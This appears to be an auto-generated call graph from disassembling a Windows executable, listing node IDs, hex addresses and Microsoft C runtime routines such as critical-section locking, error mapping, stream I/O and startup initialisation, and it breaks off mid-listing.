___scrt_is_nonwritable_in_current_image 22823->22824 22825 133bfa7 22824->22825 22826 133bf8f 22824->22826 22828 133c064 22825->22828 22831 133bfdd 22825->22831 22827 1331058 __dosmaperr 10 API calls 22826->22827 22830 133bf94 22827->22830 22829 1331058 __dosmaperr 10 API calls 22828->22829 22832 133c069 22829->22832 22833 133106b __dosmaperr 10 API calls 22830->22833 22834 133bfe6 22831->22834 22835 133bffb 22831->22835 22836 133106b __dosmaperr 10 API calls 22832->22836 22849 133af2d 22833->22849 22837 1331058 __dosmaperr 10 API calls 22834->22837 22850 1340634 EnterCriticalSection 22835->22850 22839 133bff3 22836->22839 22840 133bfeb 22837->22840 22843 1330f6d __strnicoll 40 API calls 22839->22843 22842 133106b __dosmaperr 10 API calls 22840->22842 22841 133c001 22844 133106b __dosmaperr 10 API calls 22841->22844 22846 133c02d 22841->22846 22842->22839 22843->22849 22845 133c022 22844->22845 22847 1331058 __dosmaperr 10 API calls 22845->22847 22851 133c05c 22846->22851 22847->22846 22849->22815 22849->22817 22850->22841 22854 1340657 LeaveCriticalSection 22851->22854 22853 133c062 22853->22849 22854->22853 21366 132777a 21367 1327786 __EH_prolog3_GS 21366->21367 21370 13277d3 21367->21370 21371 13277ec 21367->21371 21374 132779d 21367->21374 21382 13267f7 21370->21382 21385 133163a 21371->21385 21430 1329f36 21374->21430 21375 132780b 21378 13278ab 21375->21378 21380 13278c4 21375->21380 21381 133163a 42 API calls 21375->21381 21405 132751c 21375->21405 21422 1322f70 21378->21422 21380->21378 21409 1332599 21380->21409 21381->21375 21383 133163a 42 API calls 21382->21383 21384 1326802 21383->21384 21384->21374 21386 1331646 ___scrt_is_nonwritable_in_current_image 21385->21386 21387 1331650 21386->21387 21388 1331668 21386->21388 21389 133106b __dosmaperr 10 API calls 21387->21389 21433 132e2f8 EnterCriticalSection 21388->21433 21391 1331655 21389->21391 21393 1330f6d __strnicoll 40 API calls 21391->21393 21392 1331672 21394 133170e 21392->21394 21396 1338d82 _Ungetc 40 API calls 21392->21396 21395 1331660 _Fputc 21393->21395 21434 13315f3 21394->21434 21395->21375 21398 133168f 21396->21398 21398->21394 21401 13316e6 21398->21401 21399 1331714 21441 133173e 21399->21441 21402 133106b __dosmaperr 10 API calls 21401->21402 21403 13316eb 21402->21403 21404 1330f6d __strnicoll 40 API calls 21403->21404 21404->21395 21406 1327543 21405->21406 21407 1327528 21405->21407 21445 1326831 21406->21445 21407->21375 21410 13325a5 ___scrt_is_nonwritable_in_current_image 21409->21410 21411 13325c1 21410->21411 21412 13325ac 21410->21412 21450 132e2f8 EnterCriticalSection 21411->21450 21413 133106b __dosmaperr 10 API calls 21412->21413 21415 13325b1 21413->21415 21417 1330f6d __strnicoll 40 API calls 21415->21417 21416 13325cb 21451 13324a0 21416->21451 21420 13325bc 21417->21420 21420->21380 21423 1322f7b 21422->21423 21424 1322f98 codecvt 21422->21424 21423->21424 21425 1330f7d std::ios_base::_Init 40 API calls 21423->21425 21424->21374 21426 1322fba 21425->21426 21466 13211c0 21426->21466 21431 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21430->21431 21432 1329f40 21431->21432 21432->21432 21433->21392 21435 13315ff 21434->21435 21439 1331614 __fread_nolock 21434->21439 21436 133106b __dosmaperr 10 API calls 21435->21436 21437 1331604 21436->21437 21438 1330f6d __strnicoll 40 API calls 21437->21438 21440 133160f 21438->21440 21439->21399 21440->21399 21444 132e30c LeaveCriticalSection 21441->21444 21443 1331744 21443->21395 21444->21443 21446 13268cc 21445->21446 21449 1326850 _Yarn 21445->21449 21447 1321380 std::ios_base::_Init 41 API calls 21446->21447 21448 13268d1 21447->21448 21449->21407 21450->21416 21452 13324b8 21451->21452 21454 1332528 21451->21454 21453 1338d82 _Ungetc 40 API calls 21452->21453 21455 13324be 21453->21455 21456 133c693 _Ungetc 10 API calls 21454->21456 21459 1332520 21454->21459 21455->21454 21457 1332510 21455->21457 21456->21459 21458 133106b __dosmaperr 10 API calls 21457->21458 21460 1332515 21458->21460 21462 1332604 21459->21462 21461 1330f6d __strnicoll 40 API calls 21460->21461 21461->21459 21465 132e30c LeaveCriticalSection 21462->21465 21464 133260a 21464->21420 21465->21464 21467 13211db 21466->21467 21498 1330bca 21467->21498 21470 1323cb0 21471 1323cdf 21470->21471 21472 1325390 70 API calls 21471->21472 21473 1323d3f 21472->21473 21539 1322e70 21473->21539 21499 1330bde _Fputc 21498->21499 21504 132e535 21499->21504 21502 132f150 _Fputc 40 API calls 21503 13211e5 21502->21503 21503->21470 21505 132e541 21504->21505 21506 132e564 21504->21506 21507 1330ef0 _Fputc 40 API calls 21505->21507 21511 132e58b 21506->21511 21512 132e3c1 21506->21512 21510 132e55c 21507->21510 21508 1330ef0 _Fputc 40 API calls 21508->21510 21510->21502 21511->21508 21511->21510 21513 132e410 21512->21513 21514 132e3ed 21512->21514 21513->21514 21517 132e418 21513->21517 21515 1330ef0 _Fputc 40 API calls 21514->21515 21516 132e405 21515->21516 21518 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21516->21518 21523 132f770 21517->21523 21519 132e533 21518->21519 21519->21511 21522 132f18c 10 API calls 21522->21516 21535 13308de 21523->21535 21525 132f797 21526 1330ef0 _Fputc 40 API calls 21525->21526 21527 132e499 21526->21527 21527->21522 21528 1330830 _Fputc 40 API calls 21530 132f789 std::_Locinfo::_Locinfo_ctor 21528->21530 21529 132f44c 40 API calls 21529->21530 21530->21525 21530->21527 21530->21528 21530->21529 21531 132f9d8 21530->21531 21532 1330ef0 _Fputc 40 API calls 21531->21532 21533 132f9f4 21532->21533 21534 1330ef0 _Fputc 40 API calls 21533->21534 21534->21527 21536 1330902 21535->21536 21537 13308e9 21535->21537 21536->21530 21538 1330ef0 _Fputc 40 API calls 21537->21538 21538->21536 21540 1322f67 21539->21540 21541 1321380 std::ios_base::_Init 41 API calls 21540->21541 21542 1322f6c 21541->21542 23006 132e266 23007 1331595 ___scrt_uninitialize_crt 69 API calls 23006->23007 23008 132e26e 23007->23008 23016 1337b43 23008->23016 23010 132e273 23011 1337bee 10 API calls 23010->23011 23012 132e282 DeleteCriticalSection 23011->23012 23012->23010 23013 132e29d 23012->23013 23014 133737f ___free_lconv_mon 10 API calls 23013->23014 23015 132e2a8 23014->23015 23017 1337b4f ___scrt_is_nonwritable_in_current_image 23016->23017 23026 13310bf EnterCriticalSection 23017->23026 23019 1337b5a 23020 1337bc6 23019->23020 23023 1337b9a DeleteCriticalSection 23019->23023 23025 133125a 70 API calls 23019->23025 23027 1337be5 23020->23027 23024 133737f ___free_lconv_mon 10 API calls 23023->23024 23024->23019 23025->23019 23026->23019 23030 1331107 LeaveCriticalSection 23027->23030 23029 1337bd2 23029->23010 23030->23029 23061 1328a6e 23062 1328a89 23061->23062 23064 1328a9b 23062->23064 23065 132814f 23062->23065 23068 1332ef9 23065->23068 23069 1332f05 ___scrt_is_nonwritable_in_current_image 23068->23069 23070 1332f23 23069->23070 23071 1332f0c 23069->23071 23081 132e2f8 EnterCriticalSection 23070->23081 23073 133106b __dosmaperr 10 API calls 23071->23073 23075 1332f11 23073->23075 23074 1332f32 23082 1332e43 23074->23082 23077 1330f6d __strnicoll 40 API calls 23075->23077 23079 1328161 23077->23079 23078 1332f40 23096 1332f6f 23078->23096 23079->23064 23081->23074 23083 1332e59 23082->23083 23085 1332ee3 _Ungetc 23082->23085 23084 1332e87 23083->23084 23083->23085 23086 133c693 _Ungetc 10 API calls 23083->23086 23084->23085 23087 1338d82 _Ungetc 40 API calls 23084->23087 23085->23078 23086->23084 23088 1332e99 23087->23088 23089 1332ebc 23088->23089 23090 1338d82 _Ungetc 40 API calls 23088->23090 23089->23085 23099 1332d36 23089->23099 23091 1332ea5 23090->23091 23091->23089 23093 1338d82 _Ungetc 40 API calls 23091->23093 23094 1332eb1 23093->23094 23095 1338d82 _Ungetc 40 API calls 23094->23095 23095->23089 23118 132e30c LeaveCriticalSection 23096->23118 23098 1332f75 23098->23079 23100 1338d82 _Ungetc 40 API calls 23099->23100 23101 1332d59 23100->23101 23102 1338d82 _Ungetc 40 API calls 23101->23102 23109 1332d82 23101->23109 23103 1332d67 23102->23103 23105 1338d82 _Ungetc 40 API calls 23103->23105 23103->23109 23107 1332d75 23105->23107 23106 1332dbc 23106->23106 23110 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23106->23110 23108 1338d82 _Ungetc 40 API calls 23107->23108 23108->23109 23109->23106 23112 1338bde 23109->23112 23111 1332e3a 23110->23111 23111->23085 23113 1338bf1 _Fputc 23112->23113 23114 1338a74 _Fputc 42 API calls 23113->23114 23115 1338c06 23114->23115 23116 132f150 _Fputc 40 API calls 23115->23116 23117 1338c13 23116->23117 23117->23106 23118->23098 23135 1328c51 23136 1328c60 23135->23136 23138 1328c84 23136->23138 23139 1332466 23136->23139 23140 1332479 _Fputc 23139->23140 23145 133239d 23140->23145 23142 133248e 23143 132f150 _Fputc 40 API calls 23142->23143 23144 133249b 23143->23144 23144->23138 23146 13323af 23145->23146 23148 13323d2 23145->23148 23147 1330ef0 _Fputc 40 API calls 23146->23147 23149 13323ca 23147->23149 23148->23146 23150 13323f9 23148->23150 23149->23142 23153 13322a2 23150->23153 23154 13322ae ___scrt_is_nonwritable_in_current_image 23153->23154 23161 132e2f8 EnterCriticalSection 23154->23161 23156 13322bc 23162 13322fd 23156->23162 23158 13322c9 23171 13322f1 23158->23171 23161->23156 23163 13314c7 ___scrt_uninitialize_crt 65 API calls 23162->23163 23164 1332318 23163->23164 23165 1337bee 10 API calls 23164->23165 23166 1332322 23165->23166 23167 133233d 23166->23167 23168 1337322 __Getctype 10 API calls 23166->23168 23167->23158 23169 1332361 23168->23169 23170 133737f ___free_lconv_mon 10 API calls 23169->23170 23170->23167 23174 132e30c LeaveCriticalSection 23171->23174 23173 13322da 23173->23142 23174->23173 17922 1329b40 17923 1329b4c ___scrt_is_nonwritable_in_current_image 17922->17923 17948 1329d42 17923->17948 17925 1329b53 17926 1329cac 17925->17926 17936 1329b7d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 17925->17936 18018 132a555 IsProcessorFeaturePresent 17926->18018 17928 1329cb3 17997 1334ed2 17928->17997 17933 1329b9c 17934 1329c1d 17959 1334b10 17934->17959 17936->17933 17936->17934 18000 1334eac 17936->18000 17938 1329c23 17963 13228d0 17938->17963 17949 1329d4b 17948->17949 18025 132a01c IsProcessorFeaturePresent 17949->18025 17953 1329d5c 17954 1329d60 17953->17954 18035 1336aec 17953->18035 17954->17925 17957 1329d77 17957->17925 17960 1334b1e 17959->17960 17961 1334b19 17959->17961 17960->17938 18344 133486a 17961->18344 18716 1322bc0 17963->18716 17965 132292b 18732 1325f40 17965->18732 17967 132294d 18742 1324c70 17967->18742 17969 132297a 18777 1325390 17969->18777 17971 1322955 17971->17969 18752 1322c80 17971->18752 18761 13249c0 17971->18761 19836 1334cba 17997->19836 18001 1334ec2 std::_Lockit::_Lockit 18000->18001 18002 1336b8d ___scrt_is_nonwritable_in_current_image 18000->18002 18001->17934 18003 1339221 __Getctype 40 API calls 18002->18003 18006 1336b9e 18003->18006 18004 13335e1 __FrameHandler3::FrameUnwindToState 40 API calls 18005 1336bc8 18004->18005 18006->18004 18019 132a56b __CreateFrameInfo codecvt 18018->18019 18020 132a616 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18019->18020 18021 132a661 __CreateFrameInfo 18020->18021 18021->17928 18022 1334e96 18023 1334cba __CreateFrameInfo 20 API calls 18022->18023 18024 1329cc1 18023->18024 18026 1329d57 18025->18026 18027 132cd9e 18026->18027 18044 132de77 18027->18044 18030 132cda7 18030->17953 18032 132cdaf 18033 132cdba 18032->18033 18058 132deb3 18032->18058 18033->17953 18098 1342acf 18035->18098 18038 132cdbd 18039 132cdd0 18038->18039 18040 132cdc6 18038->18040 18039->17954 18041 132cf36 ___vcrt_uninitialize_ptd 6 API calls 18040->18041 18042 132cdcb 18041->18042 18043 132deb3 ___vcrt_uninitialize_locks DeleteCriticalSection 18042->18043 18043->18039 18045 132de80 18044->18045 18047 132dea9 18045->18047 18048 132cda3 18045->18048 18062 132e0bc 18045->18062 18049 132deb3 ___vcrt_uninitialize_locks DeleteCriticalSection 18047->18049 18048->18030 18050 132cf03 18048->18050 18049->18048 18079 132dfcd 18050->18079 18053 132cf18 18053->18032 18056 132cf33 18056->18032 18059 132dedd 18058->18059 18060 132debe 18058->18060 18059->18030 18061 132dec8 DeleteCriticalSection 18060->18061 18061->18059 18061->18061 18067 132dee2 18062->18067 18065 132e0f4 InitializeCriticalSectionAndSpinCount 18066 132e0df 18065->18066 18066->18045 18068 132deff 18067->18068 18069 132df03 18067->18069 18068->18065 18068->18066 18069->18068 18070 132df6b GetProcAddress 18069->18070 18072 132df5c 18069->18072 18074 132df82 LoadLibraryExW 18069->18074 18070->18068 18072->18070 18073 132df64 FreeLibrary 18072->18073 18073->18070 18075 132dfc9 18074->18075 18076 132df99 GetLastError 18074->18076 18075->18069 18076->18075 18077 132dfa4 ___vcrt_FlsGetValue 18076->18077 18077->18075 18078 132dfba LoadLibraryExW 18077->18078 18078->18069 18080 132dee2 ___vcrt_FlsGetValue 5 API calls 18079->18080 18081 132dfe7 18080->18081 18082 132e000 TlsAlloc 18081->18082 18083 132cf0d 18081->18083 18083->18053 18084 132e07e 18083->18084 18085 132dee2 ___vcrt_FlsGetValue 5 API calls 18084->18085 18086 132e098 18085->18086 18087 132e0b3 TlsSetValue 18086->18087 18088 132cf26 18086->18088 18087->18088 18088->18056 18089 132cf36 18088->18089 18090 132cf40 18089->18090 18091 132cf46 18089->18091 18093 132e008 18090->18093 18091->18053 18094 132dee2 ___vcrt_FlsGetValue 5 API calls 18093->18094 18095 132e022 18094->18095 18096 132e03a TlsFree 18095->18096 18097 132e02e 18095->18097 18096->18097 18097->18091 18099 1342adf 18098->18099 18100 1329d69 18098->18100 18099->18100 18103 1337d94 18099->18103 18115 1337ce4 18099->18115 18100->17957 18100->18038 18104 1337da0 ___scrt_is_nonwritable_in_current_image 18103->18104 18120 13310bf EnterCriticalSection 18104->18120 18106 1337da7 18121 1340596 18106->18121 18113 1337ce4 2 API calls 18114 1337dc5 18113->18114 18140 1337deb 18114->18140 18116 1337ceb 18115->18116 18117 1337d2e GetStdHandle 18116->18117 18118 1337d90 18116->18118 18119 1337d41 GetFileType 18116->18119 18117->18116 18118->18099 18119->18116 18120->18106 18122 13405a2 ___scrt_is_nonwritable_in_current_image 18121->18122 18123 13405cc 18122->18123 18124 13405ab 18122->18124 18143 13310bf EnterCriticalSection 18123->18143 18151 133106b 18124->18151 18130 1337db6 18130->18114 18134 1337c2e GetStartupInfoW 18130->18134 18132 1340604 18157 134062b 18132->18157 18133 13405d8 18133->18132 18144 13404e6 18133->18144 18135 1337cdf 18134->18135 18136 1337c4b 18134->18136 18135->18113 18136->18135 18137 1340596 41 API calls 18136->18137 18138 1337c73 18137->18138 18138->18135 18139 1337ca3 GetFileType 18138->18139 18139->18138 18343 1331107 LeaveCriticalSection 18140->18343 18142 1337dd6 18142->18099 18143->18133 18160 1337322 18144->18160 18146 13404f8 18150 1340505 18146->18150 18167 1337967 18146->18167 18172 133737f 18150->18172 18196 1339372 GetLastError 18151->18196 18153 1331070 18154 1330f6d 18153->18154 18260 1330eb9 18154->18260 18342 1331107 LeaveCriticalSection 18157->18342 18159 1340632 18159->18130 18166 133732f __Getctype 18160->18166 18161 133736f 18163 133106b __dosmaperr 9 API calls 18161->18163 18162 133735a RtlAllocateHeap 18164 133736d 18162->18164 18162->18166 18163->18164 18164->18146 18166->18161 18166->18162 18178 13342ee 18166->18178 18191 133765a 18167->18191 18170 13379a1 InitializeCriticalSectionAndSpinCount 18171 133798c 18170->18171 18171->18146 18173 133738a HeapFree 18172->18173 18177 13373b4 18172->18177 18174 133739f GetLastError 18173->18174 18173->18177 18175 13373ac __dosmaperr 18174->18175 18176 133106b __dosmaperr 8 API calls 18175->18176 18176->18177 18177->18133 18181 133431b 18178->18181 18182 1334327 ___scrt_is_nonwritable_in_current_image 18181->18182 18187 13310bf EnterCriticalSection 18182->18187 18184 1334332 18188 133436e 18184->18188 18187->18184 18189 1331107 std::_Lockit::~_Lockit LeaveCriticalSection 18188->18189 18190 13342f9 18189->18190 18190->18166 18192 1337688 18191->18192 18194 1337684 18191->18194 18193 13376a2 GetProcAddress 18192->18193 18192->18194 18193->18194 18195 13376b2 std::_Lockit::_Lockit 18193->18195 18194->18170 18194->18171 18195->18194 18197 133938e 18196->18197 18198 1339388 18196->18198 18218 1339392 SetLastError 18197->18218 18224 13378aa 18197->18224 18219 133786b 18198->18219 18203 1337322 __Getctype 8 API calls 18204 13393bf 18203->18204 18205 13393c7 18204->18205 18206 13393d8 18204->18206 18207 13378aa __Getctype 2 API calls 18205->18207 18208 13378aa __Getctype 2 API calls 18206->18208 18209 13393d5 18207->18209 18210 13393e4 18208->18210 18215 133737f ___free_lconv_mon 8 API calls 18209->18215 18211 13393e8 18210->18211 18212 13393ff 18210->18212 18214 13378aa __Getctype 2 API calls 18211->18214 18229 133904f 18212->18229 18214->18209 18215->18218 18217 133737f ___free_lconv_mon 8 API calls 18217->18218 18218->18153 18220 133765a std::_Lockit::_Lockit GetProcAddress 18219->18220 18221 1337887 18220->18221 18222 13378a2 TlsGetValue 18221->18222 18223 1337890 18221->18223 18223->18197 18225 133765a std::_Lockit::_Lockit GetProcAddress 18224->18225 18226 13378c6 18225->18226 18227 13378e4 TlsSetValue 18226->18227 18228 13378cf 18226->18228 18228->18203 18228->18218 18234 1338ee3 18229->18234 18235 1338eef ___scrt_is_nonwritable_in_current_image 18234->18235 18248 13310bf EnterCriticalSection 18235->18248 18237 1338ef9 18249 1338f29 18237->18249 18240 1338ff5 18241 1339001 ___scrt_is_nonwritable_in_current_image 18240->18241 18252 13310bf EnterCriticalSection 18241->18252 18243 133900b 18253 13391d6 18243->18253 18245 1339023 18257 1339043 18245->18257 18248->18237 18250 1331107 std::_Lockit::~_Lockit LeaveCriticalSection 18249->18250 18251 1338f17 18250->18251 18251->18240 18252->18243 18254 13391e5 __Getctype 18253->18254 18255 133920c __Getctype 18253->18255 18254->18255 18256 13414d5 __Getctype 10 API calls 18254->18256 18255->18245 18256->18255 18258 1331107 std::_Lockit::~_Lockit LeaveCriticalSection 18257->18258 18259 1339031 18258->18259 18259->18217 18261 1330ecb _Fputc 18260->18261 18266 1330ef0 18261->18266 18263 1330ee3 18277 132f150 18263->18277 18267 1330f00 18266->18267 18270 1330f07 18266->18270 18283 132f3a0 GetLastError 18267->18283 18271 1330f15 18270->18271 18287 1330d48 18270->18287 18271->18263 18272 1330f3c 18272->18271 18290 1330f9a IsProcessorFeaturePresent 18272->18290 18274 1330f6c 18275 1330eb9 __strnicoll 40 API calls 18274->18275 18276 1330f79 18275->18276 18276->18263 18278 132f15c 18277->18278 18279 132f173 18278->18279 18322 132f3f0 18278->18322 18280 132f186 18279->18280 18282 132f3f0 _Fputc 40 API calls 18279->18282 18280->18130 18282->18280 18284 132f3b9 18283->18284 18294 1339423 18284->18294 18288 1330d53 GetLastError SetLastError 18287->18288 18289 1330d6c 18287->18289 18288->18272 18289->18272 18291 1330fa6 18290->18291 18316 1330d71 18291->18316 18295 1339436 18294->18295 18296 133943c 18294->18296 18297 133786b __Getctype GetProcAddress TlsGetValue 18295->18297 18298 13378aa __Getctype GetProcAddress TlsSetValue 18296->18298 18299 132f3d5 SetLastError 18296->18299 18297->18296 18300 1339456 18298->18300 18299->18270 18300->18299 18301 1337322 __Getctype 10 API calls 18300->18301 18302 1339466 18301->18302 18303 1339483 18302->18303 18304 133946e 18302->18304 18305 13378aa __Getctype GetProcAddress TlsSetValue 18303->18305 18306 13378aa __Getctype GetProcAddress TlsSetValue 18304->18306 18307 133948f 18305->18307 18308 133947a 18306->18308 18309 1339493 18307->18309 18310 13394a2 18307->18310 18313 133737f ___free_lconv_mon 10 API calls 18308->18313 18311 13378aa __Getctype GetProcAddress TlsSetValue 18309->18311 18312 133904f __Getctype 10 API calls 18310->18312 18311->18308 18314 13394ad 18312->18314 18313->18299 18315 133737f ___free_lconv_mon 10 API calls 18314->18315 18315->18299 18317 1330d8d __CreateFrameInfo codecvt 18316->18317 18318 1330db9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18317->18318 18321 1330e8a __CreateFrameInfo 18318->18321 18319 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18320 1330ea8 GetCurrentProcess TerminateProcess 18319->18320 18320->18274 18321->18319 18323 132f3fe GetLastError 18322->18323 18324 132f43f 18322->18324 18325 132f40d 18323->18325 18324->18279 18326 1339423 _Fputc 10 API calls 18325->18326 18327 132f42a SetLastError 18326->18327 18327->18324 18328 132f446 18327->18328 18331 13335e1 18328->18331 18332 133d56e __CreateFrameInfo EnterCriticalSection LeaveCriticalSection 18331->18332 18333 13335e6 18332->18333 18334 13335f1 18333->18334 18335 133d5b3 __CreateFrameInfo 39 API calls 18333->18335 18336 13335fb IsProcessorFeaturePresent 18334->18336 18341 133361a 18334->18341 18335->18334 18337 1333607 18336->18337 18339 1330d71 __CreateFrameInfo 8 API calls 18337->18339 18338 1334e96 __CreateFrameInfo 20 API calls 18340 1333624 18338->18340 18339->18341 18341->18338 18342->18159 18343->18142 18345 1334873 18344->18345 18346 1334889 18344->18346 18345->18346 18350 1334896 18345->18350 18346->17960 18348 1334880 18348->18346 18367 1334a01 18348->18367 18351 13348a2 18350->18351 18352 133489f 18350->18352 18375 133fd8b 18351->18375 18352->18348 18357 13348b3 18359 133737f ___free_lconv_mon 10 API calls 18357->18359 18358 13348bf 18402 13348f0 18358->18402 18361 13348b9 18359->18361 18361->18348 18363 133737f ___free_lconv_mon 10 API calls 18364 13348e3 18363->18364 18365 133737f ___free_lconv_mon 10 API calls 18364->18365 18366 13348e9 18365->18366 18366->18348 18368 1334a72 18367->18368 18370 1334a10 18367->18370 18368->18346 18369 133ecdb WideCharToMultiByte _Fputc 18369->18370 18370->18368 18370->18369 18371 1337322 __Getctype 10 API calls 18370->18371 18373 1334a76 18370->18373 18374 133737f ___free_lconv_mon 10 API calls 18370->18374 18371->18370 18372 133737f ___free_lconv_mon 10 API calls 18372->18368 18373->18372 18374->18370 18376 13348a8 18375->18376 18377 133fd94 18375->18377 18381 134008d GetEnvironmentStringsW 18376->18381 18424 13392dc 18377->18424 18382 13400a5 18381->18382 18397 13348ad 18381->18397 18383 133ecdb _Fputc WideCharToMultiByte 18382->18383 18384 13400c2 18383->18384 18385 13400d7 18384->18385 18386 13400cc FreeEnvironmentStringsW 18384->18386 18387 1337e20 __strnicoll 11 API calls 18385->18387 18386->18397 18388 13400de 18387->18388 18389 13400e6 18388->18389 18390 13400f7 18388->18390 18392 133737f ___free_lconv_mon 10 API calls 18389->18392 18391 133ecdb _Fputc WideCharToMultiByte 18390->18391 18393 1340107 18391->18393 18394 13400eb FreeEnvironmentStringsW 18392->18394 18395 1340116 18393->18395 18396 134010e 18393->18396 18394->18397 18399 133737f ___free_lconv_mon 10 API calls 18395->18399 18398 133737f ___free_lconv_mon 10 API calls 18396->18398 18397->18357 18397->18358 18400 1340114 FreeEnvironmentStringsW 18398->18400 18399->18400 18400->18397 18403 1334905 18402->18403 18404 1337322 __Getctype 10 API calls 18403->18404 18405 133492c 18404->18405 18406 1334934 18405->18406 18407 133493e 18405->18407 18408 133737f ___free_lconv_mon 10 API calls 18406->18408 18410 133499b 18407->18410 18412 1337322 __Getctype 10 API calls 18407->18412 18413 13349aa 18407->18413 18418 13349c5 18407->18418 18420 133737f ___free_lconv_mon 10 API calls 18407->18420 18701 1336bc9 18407->18701 18409 13348c6 18408->18409 18409->18363 18411 133737f ___free_lconv_mon 10 API calls 18410->18411 18411->18409 18412->18407 18710 13349d2 18413->18710 18417 133737f ___free_lconv_mon 10 API calls 18419 13349b7 18417->18419 18421 1330f9a __Getctype 11 API calls 18418->18421 18422 133737f ___free_lconv_mon 10 API calls 18419->18422 18420->18407 18423 13349d1 18421->18423 18422->18409 18425 13392e7 18424->18425 18426 13392ed 18424->18426 18428 133786b __Getctype 2 API calls 18425->18428 18427 13378aa __Getctype 2 API calls 18426->18427 18446 13392f3 18426->18446 18429 1339307 18427->18429 18428->18426 18430 1337322 __Getctype 10 API calls 18429->18430 18429->18446 18432 1339317 18430->18432 18431 13335e1 __FrameHandler3::FrameUnwindToState 40 API calls 18433 1339371 18431->18433 18434 1339334 18432->18434 18435 133931f 18432->18435 18437 13378aa __Getctype 2 API calls 18434->18437 18436 13378aa __Getctype 2 API calls 18435->18436 18439 133932b 18436->18439 18438 1339340 18437->18438 18440 1339353 18438->18440 18441 1339344 18438->18441 18444 133737f ___free_lconv_mon 10 API calls 18439->18444 18443 133904f __Getctype 10 API calls 18440->18443 18442 13378aa __Getctype 2 API calls 18441->18442 18442->18439 18445 133935e 18443->18445 18444->18446 18447 133737f ___free_lconv_mon 10 API calls 18445->18447 18446->18431 18448 13392f8 18446->18448 18447->18448 18449 133fb96 18448->18449 18472 133fceb 18449->18472 18473 133fcf7 ___scrt_is_nonwritable_in_current_image 18472->18473 18480 133fd11 18473->18480 18516 13310bf EnterCriticalSection 18473->18516 18475 133fd4d 18517 133fd6a 18475->18517 18477 13335e1 __FrameHandler3::FrameUnwindToState 40 API calls 18481 133fd8a 18477->18481 18478 133fbc0 18483 133f916 18478->18483 18479 133fd21 18479->18475 18482 133737f ___free_lconv_mon 10 API calls 18479->18482 18480->18477 18480->18478 18482->18475 18521 1333625 18483->18521 18516->18479 18520 1331107 LeaveCriticalSection 18517->18520 18519 133fd71 18519->18480 18520->18519 18522 1333643 18521->18522 18528 1339221 GetLastError 18522->18528 18529 133923d 18528->18529 18530 1339237 18528->18530 18532 13378aa __Getctype 2 API calls 18529->18532 18534 1339241 SetLastError 18529->18534 18531 133786b __Getctype 2 API calls 18530->18531 18531->18529 18533 1339259 18532->18533 18533->18534 18536 1337322 __Getctype 10 API calls 18533->18536 18538 1333664 18534->18538 18539 13392d6 18534->18539 18537 133926e 18536->18537 18541 1339287 18537->18541 18542 1339276 18537->18542 18555 1337e6e 18538->18555 18540 13335e1 __FrameHandler3::FrameUnwindToState 38 API calls 18539->18540 18544 13392db 18540->18544 18543 13378aa __Getctype 2 API calls 18541->18543 18545 13378aa __Getctype 2 API calls 18542->18545 18546 1339293 18543->18546 18549 1339284 18545->18549 18547 1339297 18546->18547 18548 13392ae 18546->18548 18550 13378aa __Getctype 2 API calls 18547->18550 18552 133904f __Getctype 10 API calls 18548->18552 18551 133737f ___free_lconv_mon 10 API calls 18549->18551 18550->18549 18551->18534 18553 13392b9 18552->18553 18554 133737f ___free_lconv_mon 10 API calls 18553->18554 18554->18534 18556 1337e81 18555->18556 18557 133367a 18555->18557 18556->18557 18563 1341721 18556->18563 18559 1337ecc 18557->18559 18560 1337edf 18559->18560 18562 1337ef4 18559->18562 18560->18562 18584 133fdd3 18560->18584 18564 134172d ___scrt_is_nonwritable_in_current_image 18563->18564 18565 1339221 __Getctype 40 API calls 18564->18565 18566 1341736 18565->18566 18568 134177c 18566->18568 18576 13310bf EnterCriticalSection 18566->18576 18568->18557 18569 1341754 18577 13417a2 18569->18577 18574 13335e1 __FrameHandler3::FrameUnwindToState 40 API calls 18575 13417a1 18574->18575 18576->18569 18578 1341765 18577->18578 18579 13417b0 __Getctype 18577->18579 18581 1341781 18578->18581 18579->18578 18580 13414d5 __Getctype 10 API calls 18579->18580 18580->18578 18582 1331107 std::_Lockit::~_Lockit LeaveCriticalSection 18581->18582 18583 1341778 18582->18583 18583->18568 18583->18574 18585 1339221 __Getctype 40 API calls 18584->18585 18586 133fdd8 18585->18586 18587 133fceb __strnicoll 40 API calls 18586->18587 18588 133fde3 18587->18588 18588->18562 18702 1336bd7 18701->18702 18703 1336be5 18701->18703 18702->18703 18708 1336bfd 18702->18708 18704 133106b __dosmaperr 10 API calls 18703->18704 18705 1336bed 18704->18705 18707 1330f6d __strnicoll 40 API calls 18705->18707 18706 1336bf7 18706->18407 18707->18706 18708->18706 18709 133106b __dosmaperr 10 API calls 18708->18709 18709->18705 18711 13349df 18710->18711 18712 13349b0 18710->18712 18713 13349f6 18711->18713 18714 133737f ___free_lconv_mon 10 API calls 18711->18714 18712->18417 18715 133737f ___free_lconv_mon 10 API calls 18713->18715 18714->18711 18715->18712 18717 1322bf2 18716->18717 18725 1322c1c _Yarn 18716->18725 18718 1322bf9 18717->18718 18719 1322c6d 18717->18719 18721 1322c2b 18718->18721 18722 1322c08 18718->18722 18876 1325ea0 18719->18876 18721->18725 18728 1329a1a std::ios_base::_Init 3 API calls 18721->18728 18723 1322c72 18722->18723 18724 1322c0f 18722->18724 18879 1321300 18723->18879 18727 1329a1a std::ios_base::_Init 3 API calls 18724->18727 18725->17965 18729 1322c15 18727->18729 18728->18725 18729->18725 18730 1330f7d std::ios_base::_Init 40 API calls 18729->18730 18731 1322c7c 18730->18731 18736 1326118 _Yarn 18732->18736 18740 1325f70 18732->18740 18733 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18734 132629d 18733->18734 18734->17967 18735 1326213 18738 1329a0c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18735->18738 18736->18733 18736->18736 18737 1326154 18737->18735 18737->18736 18739 132625b 18738->18739 18739->17967 18740->18736 18740->18737 18741 1325f40 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18740->18741 18741->18740 18743 1324cbf 18742->18743 18907 